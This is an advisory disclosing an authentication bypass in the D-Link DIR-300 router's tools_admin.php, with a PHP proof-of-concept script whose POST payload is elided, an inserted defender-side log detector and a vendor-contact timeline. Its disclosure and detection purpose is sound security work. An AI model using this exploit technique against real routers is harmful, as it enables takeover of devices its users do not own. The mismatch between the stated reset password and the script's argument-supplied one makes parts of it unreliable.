D-Link DIR-300 authentication bypass

Hello, I found a security bug in the D-Link DIR-300 wireless router. It can
be used to bypass the authentication mechanism by an attacker with access to
the web interface. I reported it to D-Link but they are not replying to
my emails. Judging by other D-Link security holes and their status I
think that they won't reply, so I decided to write about it here.

[Technical details]

The control panel script tools_admin.php allows an attacker to change the
administrator name, password and other variables without any
authorization by sending a specially crafted HTTP POST request such as:

---cut here---
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

---cut here---

If an attacker makes this request to the control panel, the
administrator username is set to admin with the password "uhOHahEh".
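A defender-side check, added here and not part of the original advisory: it scans log lines written by a proxy in front of the control panel for POSTs to tools_admin.php that carry no session cookie (the unauthenticated request described above) or that come from a host outside an administrator allowlist. The log format, the "uid" cookie name, the addresses and the sample lines are all constructed assumptions.

```python
import re
from collections import namedtuple

# Constructed sample lines: combined-style access log extended with the
# request's Cookie header (assumed to be logged by a proxy in front of the
# router). None of these come from the original advisory.
SAMPLE_LOG = """\
192.168.0.10 - - [07/Aug/2010:10:01:12 +0200] "GET /index.php HTTP/1.1" 200 4312 "uid=a1b2c3"
192.168.0.10 - - [07/Aug/2010:10:01:40 +0200] "POST /tools_admin.php HTTP/1.1" 200 2210 "uid=a1b2c3"
192.168.0.55 - - [07/Aug/2010:10:02:03 +0200] "POST /tools_admin.php HTTP/1.1" 200 2210 "-"
192.168.0.55 - - [07/Aug/2010:10:02:05 +0200] "POST /login.php HTTP/1.1" 200 1800 "-"
"""

# src, ts, method, path, status, cookie; the request line's protocol is skipped.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<cookie>[^"]*)"$'
)

Alert = namedtuple("Alert", "src ts reason")

# Admin-only scripts of the DIR-300 panel; the advisory names tools_admin.php.
PROTECTED_PATHS = {"/tools_admin.php"}


def parse_line(line):
    """Return the fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text, admin_hosts=frozenset()):
    """Alert on POSTs to admin scripts without a session cookie (the change
    the advisory describes) or from outside the administrator allowlist."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] not in PROTECTED_PATHS:
            continue
        if rec["cookie"] in ("", "-"):
            alerts.append(Alert(rec["src"], rec["ts"], "unauthenticated POST to " + rec["path"]))
        elif admin_hosts and rec["src"] not in admin_hosts:
            alerts.append(Alert(rec["src"], rec["ts"], "admin POST from non-admin host"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG, admin_hosts={"192.168.0.10"}):
        print(alert)
```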

[Affected devices]
- All known D-Link DIR-300 firmware (i.e. 2.01B1, 1.04, 1.05).
- It is possible that other D-Link devices which use the same PHP
scripts in the control panel are affected. I'm not able to check it
because I don't have the devices for tests. I'm counting on you ;->

[Proof of concept]
---cut here---
<?php
// Proof-of-concept script as posted in the advisory. Several lines were cut
// from the original post; the missing pieces are marked below and left as
// placeholders rather than reconstructed.
if (sizeof($argv) != 4) {
    echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
    exit(1);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://" . $argv[1] . "/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
// The POST body was cut from the original post and is not reproduced here.
$postfields = ''; // elided in the original
curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
echo "+ starting request\n";
$out = curl_exec($ch);
if ($out === false) {
    // The original line was cut after "("; the cURL error text is the likely remainder.
    echo "- Error: could not connect (" . curl_error($ch) . ")\n";
    exit(1);
} else {
    echo "+ request sent\n";
}
if (stripos($out, "Successfully") === false) {
    echo "- something went wrong (check answer - answer.html)!\n";
    $f = fopen("answer.html", "w"); fwrite($f, $out); fclose($f);
} else {
    echo "+ ok, now you can login using l: admin p: $argv[3]\n";
}
---cut here---

[Timeline]
 - Information sent to vendor 07.08.2010
 - No response
 - Information resent to vendor 07.31.2010
 - No response from vendor

Karol Celiński ( Celin )
Pentester/Researcher @ Safe Computing


karol at celin dot pl

Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing